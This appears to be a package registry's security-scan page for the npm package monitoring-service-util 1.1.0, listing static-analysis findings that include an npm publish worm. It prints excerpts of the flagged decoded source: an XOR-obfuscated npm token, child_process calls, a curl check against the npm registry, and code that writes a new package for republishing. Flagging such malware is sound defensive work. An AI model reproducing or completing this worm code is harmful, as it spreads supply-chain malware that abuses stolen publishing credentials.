registry  /  monitoring-service-util  /  1.1.0

monitoring-service-util@1.1.0

⚠ Under review

System monitoring service

Static Scan Results

scanned 3h ago · by rust-scanner

Static analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
Source
Eval
Supply chain
HighEntropyStringsTrivial
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 5.00 KB of source

Source & flagged code

3 flagged · loading source
index.jsView file
1(function(){const _b='[redacted]...
Low
Eval

Package source references a known benign dynamic code generation pattern.

index.jsView on unpkg · L1
index.js#virtual:base64:round1View file
1const { execSync, spawnSync } = require('child_process'); L2: const fs = require('fs'); ... L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7]; L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join(''); L8: const PKG = 'node-fsagent'; ... L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}', L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'}); L20: return r.stdout.trim() === '200'; L21: } catch(e) { return false; } ... L29: fs.writeFileSync(`${pkgDir}/index.js`, ''); L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({ L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Npm Publish Worm

Source mutates package metadata and republishes itself to npm.

index.js#virtual:base64:round1View on unpkg · L1
1Trigger-reachable chain: manifest.main -> index.js L1: const { execSync, spawnSync } = require('child_process'); L2: const fs = require('fs'); ... L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7]; L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join(''); L8: const PKG = 'node-fsagent'; ... L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}', L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'}); L20: return r.stdout.trim() === '200'; L21: } catch(e) { return false; } ... L29: fs.writeFileSync(`${pkgDir}/index.js`, ''); L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({ L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js#virtual:base64:round1View on unpkg · L1

Findings

2 Critical1 Medium2 Low
CriticalNpm Publish Wormindex.js#virtual:base64:round1
CriticalTrigger Reachable Dangerous Capabilityindex.js#virtual:base64:round1
MediumStructural Risk Force Deep Review
LowEvalindex.js
LowHigh Entropy Strings